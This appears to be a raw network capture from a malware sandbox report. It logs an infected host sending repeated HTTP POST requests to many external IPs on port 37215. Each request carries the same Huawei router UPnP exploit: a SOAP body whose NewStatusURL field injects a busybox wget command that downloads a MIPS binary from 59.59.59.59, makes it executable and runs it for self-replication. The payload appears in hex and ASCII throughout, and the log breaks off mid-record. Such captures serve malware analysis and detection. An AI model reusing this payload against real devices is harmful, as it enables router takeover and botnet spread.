                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1865192.168.2.1552594197.225.126.17437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.950248003 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1866192.168.2.1535600158.200.222.8837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.950305939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1867192.168.2.155832418.149.14.10837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.950311899 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1868192.168.2.1533650138.186.147.12437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.957290888 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1869192.168.2.153763841.118.19.1437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.957340002 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1870192.168.2.1546306157.168.126.7837215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.964246988 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1871192.168.2.153636241.136.113.14337215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.964260101 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1872192.168.2.153337041.177.62.9437215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.966619015 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1873192.168.2.1533526157.208.207.1937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.969301939 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 2f 74 6d 70 2f 2e 6f 78 79 20 2d 72 20 2f 79 65 79 65 2f 79 65 79 65 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2f 74 6d 70 2f 2e 6f 78 79 3b [TRUNCATED]
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 59.59.59.59 -l /tmp/.oxy -r /yeye/yeye.mips; /bin/busybox chmod 777 /tmp/.oxy; /tmp/.oxy selfrep.huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          1874192.168.2.1534828161.253.37.12937215
                                                          TimestampBytes transferredDirectionData
                                                          May 28, 2024 09:56:15.998903990 CEST833OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Content-Length: 464
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 35 39 2e 35 39 2e 35 39 2e 35 39 20 2d 6c 20 